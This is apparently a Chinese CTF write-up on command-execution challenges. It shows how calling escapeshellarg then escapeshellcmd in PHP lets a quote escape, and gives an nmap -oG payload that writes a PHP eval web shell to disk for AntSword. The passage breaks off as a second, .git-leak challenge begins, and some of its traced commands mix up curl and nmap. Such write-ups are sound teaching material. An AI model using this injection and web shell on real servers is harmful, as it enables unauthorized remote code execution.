命令执行类型CTF题
php命令执行
buu Online Tool
一段php代码审计:
大致意思是获取x-forward-for头后与glzjin拼接创建文件夹,将传入参数host通过escapeshellarg
和escapeshellcmd
方法转义后,转到之前创建的文件夹目录,执行nmap命令。
如果两方法以上述顺序执行会有绕过漏洞
- 传入的参数是:172.17.0.2‘ -v -d a=1
- 经过escapeshellarg处理后变成了’172.17.0.2’’ ’ -v -d a=1’ ,即先对单引号转义,再用单引号将语句左右用单引号括起
- 经过escapeshellcmd处理后变成了’172.17.0.2’\’ ’ -v -d a=1’ ,这是因为escapeshellcmd对\ 以及最后那个不配对的引号进行了转义
- 最后执行的命令是 curl ’172.17.0.2’ \ \ ’ ’ -v -d a=1\ ’ ,由于中间的 \ \ 被解释为 \ 而不再是转义字符,所以后面的 ’ 没有被转义,与再后面的 ’ 配对成了一个空白连接符,所以可以简化成 curl 172.10.0.2\ -v -d a=1’ ,即向172.17.0.2\ -v -d a=1’ ,即向172.17.0.2\ 发起请求,POST数据为a=1 ’
经过两次转义后出现了问题,没有考虑到单引号。
虽然单引号可以逃逸,但执行cmd的连接符被转义过滤,能利用的只有nmap命令。
在nmap命令中能执行-oG,将命令和结果写入文件,构造payload:
?host=’ <?php @eval($_POST['hack'])l;?> -oG hack.php ’
执行后会返回文件名,蚁剑连接找到flag
禁止套娃
进去后没有任何提示,buu也不能扫,只能手动试,除了.git是403,还有flag.php空页面.拿GitHack扫一下.git,能得到index.php的源码:
<?php